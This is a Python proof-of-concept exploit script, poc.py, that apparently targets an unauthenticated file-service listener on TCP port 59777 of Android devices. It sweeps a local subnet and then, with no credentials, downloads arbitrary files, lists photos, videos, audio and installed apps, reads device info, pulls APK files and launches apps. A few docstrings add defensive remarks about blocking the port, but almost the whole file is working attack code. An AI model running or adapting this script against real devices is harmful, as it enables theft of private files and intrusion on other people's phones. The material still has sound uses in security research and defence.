poc.py
import json
import optparse
import requests
import sys
from socket import *
# Module-level flag that get_file() and execute_cmd() consult before printing
# their "[*] ..." progress lines.
verbose = True
def sanitize_json(json):
    """Reshape a bracketed response body into one brace-terminated string.

    Steps, in order: single quotes become double quotes; only the text between
    the first '[' and the next ']' is kept; the last six characters of that
    text are cut off and a closing '}' is appended.

    The parameter is named ``json`` and therefore hides the ``json`` module
    inside this function. An input with no '[' raises IndexError.
    """
    double_quoted = json.replace("'", "\"")
    after_open = double_quoted.split('[')[1]
    inner = after_open.split(']')[0]
    # NOTE(review): the fixed six-character trim presumably matches a trailing
    # separator in the service's list output - confirm against a real response.
    keep = len(inner) - 6
    return inner[0:keep] + "}"
def get_file(addr, filepath):
    """Fetch ``filepath`` from the HTTP listener on ``addr``:59777 and save it locally.

    The request is a plain-HTTP GET with only a Content-Type header: no
    credentials or tokens are sent, so a 200 response means the listener
    returned the file to an unauthenticated client. Inbound connections to
    TCP 59777 are therefore the thing to block or alert on.

    Notes on the local side:
    * The output name is the text after the last '/' in ``filepath``; a path
      without '/' raises IndexError before any request is made.
    * The file is written to the current working directory and replaces any
      existing file of the same name.
    * ``verify=False`` has no effect on an ``http://`` URL, and no timeout is
      passed, so a stalled server blocks the call.
    """
    if verbose:
        print('[*] Getting file: ' + filepath + '\n\tfrom: ' + addr)

    http = requests.Session()
    url = 'http://' + addr + ':59777' + filepath
    local_name = filepath.rsplit('/', 1)[1]

    response = http.get(
        url,
        headers={"Content-Type": "application/json"},
        verify=False,
    )
    if verbose:
        print('[*] Server responded with: ' + str(response.status_code))

    # Anything other than a truthy response with status 200 is dropped silently.
    if not response or response.status_code != 200:
        return

    if verbose:
        print('[*] Writing to file: ' + local_name)
    with open(local_name, 'wb') as out:
        out.write(response.content)
def execute_cmd(addr, cmd, package):
    """POST ``cmd`` (and optionally ``package``) to ``addr``:59777 and handle the reply.

    The body is assembled by string concatenation, so ``cmd`` and ``package``
    are inserted exactly as given, without JSON quoting or escaping. Like
    get_file(), the request carries no credentials.

    Reply handling:
    * A body containing "NameNotFoundException" prints a not-found message and
      returns.
    * For every command except getDeviceInfo, appLaunch, listAppsSdcard,
      listVideos and listFiles, the body is passed through sanitize_json()
      before the status code is checked, so an unexpected body can raise there.
    * On status 200, getAppThumbnail and appPull save the raw response as
      ``package`` + ".jpg" / ".apk" in the current directory; every other
      command prints the text.

    ``package`` is used as the output file stem unchanged, and the saved bytes
    are whatever the remote device returned.
    """
    if verbose:
        print('[*] Executing command: ' + cmd + ' on ' + addr)

    http = requests.Session()
    url = 'http://' + addr + ':59777'

    body = '{ "command":' + cmd
    if package != '':
        body += ', "appPackageName":' + package
    body += ' }'

    response = http.post(
        url,
        headers={"Content-Type": "application/json"},
        data=body,
        verify=False,
    )
    if verbose:
        print('[*] Server responded with: ' + str(response.status_code))

    if "NameNotFoundException" in response.text:
        print('[!] Package \'' + package + '\' not found!')
        return

    # These commands have their reply printed as received; all others are
    # reshaped by sanitize_json() first.
    printed_raw = ('getDeviceInfo', 'appLaunch', 'listAppsSdcard', 'listVideos', 'listFiles')
    if cmd in printed_raw:
        printable = response.text
    else:
        printable = sanitize_json(response.text)

    if not response or response.status_code != 200:
        return

    # Commands whose reply is binary: progress message prefix and file suffix.
    saved_to_disk = {
        'getAppThumbnail': ('[*] Getting app thumbnail: ', ".jpg"),
        'appPull': ('[*] Pulling app: ', ".apk"),
    }
    if cmd not in saved_to_disk:
        print(printable)
        return

    notice, suffix = saved_to_disk[cmd]
    if verbose:
        print(notice + package)
    with open(package + suffix, 'wb') as out:
        out.write(response.content)
def is_up(addr):
    """Return 1 if a TCP connection to ``addr``:59777 succeeds within one second.

    Returns None otherwise. This only shows that something accepts connections
    on that port; it does not identify the service behind it.
    """
    probe = socket(AF_INET, SOCK_STREAM)
    probe.settimeout(1)
    # connect_ex() reports failure as a non-zero error code instead of raising.
    error_code = probe.connect_ex((addr, 59777))
    probe.close()
    if not error_code:
        return 1
    return None
def show_available_cmds():
    """Print a banner followed by one line per command accepted by --cmd."""
    rule = '######################'
    listing = (
        '',
        rule,
        '# Available Commands #',
        rule,
        '',
        'listFiles: List all the files',
        'listPics: List all the pictures',
        'listVideos: List all the videos',
        'listAudios: List all the audio files',
        'listApps: List all the apps installed',
        'listAppsSystem: List all the system apps',
        'listAppsPhone: List all the phone apps',
        'listAppsSdcard: List all the apk files in the sdcard',
        'listAppsAll: List all the apps installed (system apps included)',
        'getDeviceInfo: Get device info. Package name parameter is needed',
        'appPull: Pull an app from the device',
        'appLaunch: Launch an app. Package name parameter is needed',
        'getAppThumbnail: Get the icon of an app. Package name parameter is needed',
        '',
    )
    for line in listing:
        print(line)
def set_up_menu():
    """Build the option parser and parse ``sys.argv``.

    Returns the ``(options, positional_args)`` pair from ``parse_args()``.
    Every string option defaults to '' except ``network``, which defaults to
    the prefix "192.168.0."; ``verb`` is None unless -v/--verbose is given.
    """
    parser = optparse.OptionParser()

    # (flags, dest, help text, default) for each value-taking option.
    value_options = (
        (('-g', '--get-file'), "filepath", "Get file path", ""),
        (('-c', '--cmd'), "cmd", "Command to execute", ""),
        (('-p', '--pkg'), "package", "Package name", ""),
        (('--ip', '--host'), "host", "Target host IP", ""),
        (('-n', '--network'), "network", "Network to scan", "192.168.0."),
    )
    for flags, dest, help_text, default in value_options:
        parser.add_option(*flags,
                          action="store", dest=dest,
                          help=help_text, default=default)

    parser.add_option('-v', '--verbose',
                      action="store_true", dest="verb",
                      help="Loud stdout")
    return parser.parse_args()
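def main():
    """Parse the command line and run the selected mode.

    * ``list`` as the first argument prints the command list.
    * With --get-file or --cmd, each candidate address is first checked with
      is_up(); get_file() or execute_cmd() runs only for addresses that
      answer. The candidate is --host if given, otherwise the --network
      prefix with 0 through 254 appended.
    * Anything else prints the usage text.
    """
    # Bind the module-level flag. Without this declaration the assignment
    # below creates a local, get_file()/execute_cmd() keep seeing the
    # module default of True, and -v has no effect on their output.
    global verbose

    options, _ = set_up_menu()
    verbose = options.verb

    if len(sys.argv) > 1 and sys.argv[1] == 'list':
        show_available_cmds()
    elif options.filepath != '' or options.cmd != '':
        def scan_host(addr):
            """Check one address and, if it answers, run the requested action."""
            if verbose:
                print('[*] Checking address: ' + addr)
            if is_up(addr):
                if verbose:
                    print('[+] Address is up: ' + addr)
                # --get-file takes precedence when both options are supplied.
                if options.filepath != '':
                    get_file(addr, options.filepath)
                elif options.cmd != '':
                    execute_cmd(addr, options.cmd, options.package)

        if options.host != '':
            scan_host(options.host)
        else:
            for ip in range(0, 255):
                scan_host(options.network + str(ip))
    else:
        print('Usage:')
        print('- python3 poc.py list')
        print('- python3 poc.py --get-file [filepath]')
        print('- python3 poc.py --cmd [cmd]')
        print('- python3 poc.py --cmd [cmd] --host [target_host]')
        print('- python3 poc.py --cmd [cmd] --network [network]')
        print('- python3 poc.py --cmd [cmd] --pkg [package_name]')
        print('- python3 poc.py --verbose --cmd [cmd] --pkg [package_name]')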
# Run the command-line interface only when this file is executed as a script.
if __name__ == '__main__':
    main()